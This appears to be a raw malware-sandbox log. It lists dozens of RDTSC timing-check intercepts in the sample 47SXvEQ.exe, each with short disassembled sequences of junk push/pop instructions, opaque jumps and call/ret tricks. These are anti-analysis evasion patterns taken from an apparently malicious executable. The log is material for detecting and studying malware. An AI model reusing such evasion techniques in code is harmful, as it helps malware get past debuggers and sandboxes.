Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109A3D6 second address: 109A3DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109A3DA second address: 109A3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109A3E6 second address: 109A437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C7h 0x00000007 jmp 00007F87BC5165C8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F87BC5165BCh 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007F87BC5165B8h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007F87BC5165B6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109A437 second address: 109A43B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109A43B second address: 109A44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F87BC5165BAh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109B30B second address: 109B36A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F87BD02CC88h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F87BD02CC97h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a pushad 0x0000001b jmp 00007F87BD02CC8Dh 0x00000020 jo 00007F87BD02CC86h 0x00000026 popad 0x00000027 pop edi 0x00000028 mov eax, dword ptr [eax] 0x0000002a jno 00007F87BD02CC92h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109BACC second address: 109BAD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109BF76 second address: 109BF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109C05B second address: 109C066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109C239 second address: 109C23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109C3E4 second address: 109C3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109C3EA second address: 109C416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F87BD02CC96h 0x0000000b jmp 00007F87BD02CC90h 0x00000010 popad 0x00000011 push eax 0x00000012 jbe 00007F87BD02CC94h 0x00000018 pushad 0x00000019 jnc 00007F87BD02CC86h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109CB5A second address: 109CB60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109DD9F second address: 109DDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC92h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109DDB5 second address: 109DDB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109F0FA second address: 109F111 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F87BD02CC8Ch 0x00000008 jl 00007F87BD02CC86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109F111 second address: 109F117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109DDB9 second address: 109DDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BD02CC8Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109F117 second address: 109F185 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F87BC5165B8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 or dword ptr [ebp+12DC22E8h], eax 0x00000029 cld 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F87BC5165B8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 push eax 0x00000047 mov edi, dword ptr [ebp+12DC3583h] 0x0000004d pop edi 0x0000004e push 00000000h 0x00000050 xchg eax, ebx 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jne 00007F87BC5165B6h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109F185 second address: 109F1A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jnp 00007F87BD02CC94h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109F1A1 second address: 109F1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109FB9C second address: 109FBB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109FBB8 second address: 109FBC2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F87BC5165BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109F93B second address: 109F942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 109FBC2 second address: 109FBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F87BC5165C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A4FA1 second address: 10A4FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A1A24 second address: 10A1A29 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A4FA6 second address: 10A4FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1064046 second address: 1064050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F87BC5165B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1064050 second address: 1064054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1064054 second address: 1064075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F87BC5165CBh 0x0000000c jmp 00007F87BC5165C5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 1064075 second address: 106407F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F87BD02CC86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A7AA6 second address: 10A7AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F87BC5165B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A9C60 second address: 10A9C6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A9C6E second address: 10A9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10ABBB8 second address: 10ABBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A9C73 second address: 10A9C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10ABBBE second address: 10ABBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A9C79 second address: 10A9C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10A9C7D second address: 10A9C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10ACB9B second address: 10ACC33 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F87BC5165B8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov bh, 07h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F87BC5165B8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov bx, 623Ah 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F87BC5165B8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F87BC5165C9h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10AFB08 second address: 10AFB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10AFB0E second address: 10AFB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10AFB13 second address: 10AFB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F87BD02CC97h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10ADD02 second address: 10ADD0C instructions: 0x00000000 rdtsc 0x00000002 js 00007F87BC5165B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10AFB33 second address: 10AFB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10AFB39 second address: 10AFB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f js 00007F87BC5165B6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10AFB54 second address: 10AFB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC99h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10AFB76 second address: 10AFB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10ADDE2 second address: 10ADDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B2240 second address: 10B2245 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B466E second address: 10B46C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, dword ptr [ebp+12DC1C41h] 0x0000000e mov dword ptr [ebp+12DC31D9h], ecx 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 mov cl, bh 0x00000019 jmp 00007F87BD02CC95h 0x0000001e popad 0x0000001f push 00000000h 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 push edi 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 jmp 00007F87BD02CC96h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B46C2 second address: 10B46C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B134B second address: 10B135A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC8Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B35CB second address: 10B35D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B135A second address: 10B1385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F87BD02CC8Ch 0x00000008 jmp 00007F87BD02CC8Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F87BD02CC8Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B5770 second address: 10B5776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B256B second address: 10B256F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B35D1 second address: 10B35D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B1385 second address: 10B138B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B5776 second address: 10B577A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B138B second address: 10B140D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+12DC33F7h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov bh, 64h 0x00000018 mov ebx, dword ptr [ebp+12DC23BAh] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 jmp 00007F87BD02CC8Dh 0x0000002a mov eax, dword ptr [ebp+12DC0479h] 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F87BD02CC88h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push ebp 0x0000004f call 00007F87BD02CC88h 0x00000054 pop ebp 0x00000055 mov dword ptr [esp+04h], ebp 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc ebp 0x00000062 push ebp 0x00000063 ret 0x00000064 pop ebp 0x00000065 ret 0x00000066 sub dword ptr [ebp+12DC1B6Eh], ebx 0x0000006c push eax 0x0000006d pushad 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B36F6 second address: 10B36FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B65D5 second address: 10B65DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B58B6 second address: 10B5935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+12DC30E2h], edi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F87BC5165B8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 mov di, 7AF7h 0x0000003b mov eax, dword ptr [ebp+12DC0729h] 0x00000041 jmp 00007F87BC5165BBh 0x00000046 push FFFFFFFFh 0x00000048 push 00000000h 0x0000004a push ebp 0x0000004b call 00007F87BC5165B8h 0x00000050 pop ebp 0x00000051 mov dword ptr [esp+04h], ebp 0x00000055 add dword ptr [esp+04h], 00000015h 0x0000005d inc ebp 0x0000005e push ebp 0x0000005f ret 0x00000060 pop ebp 0x00000061 ret 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 jl 00007F87BC5165BCh 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B5935 second address: 10B5939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B47FD second address: 10B4803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10B73EC second address: 10B746C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F87BD02CC94h 0x0000000f sub edi, dword ptr [ebp+12DC2007h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F87BD02CC88h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F87BD02CC88h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+12DC183Dh] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 ja 00007F87BD02CC97h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C0A11 second address: 10C0A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C0153 second address: 10C0162 instructions: 0x00000000 rdtsc 0x00000002 je 00007F87BD02CC86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C0162 second address: 10C016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C016A second address: 10C0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C0172 second address: 10C0178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C05CF second address: 10C05D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C23D9 second address: 10C23EA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F87BC5165B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C23EA second address: 10C23F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C23F4 second address: 10C23F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 10C77B5 second address: 10C77B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
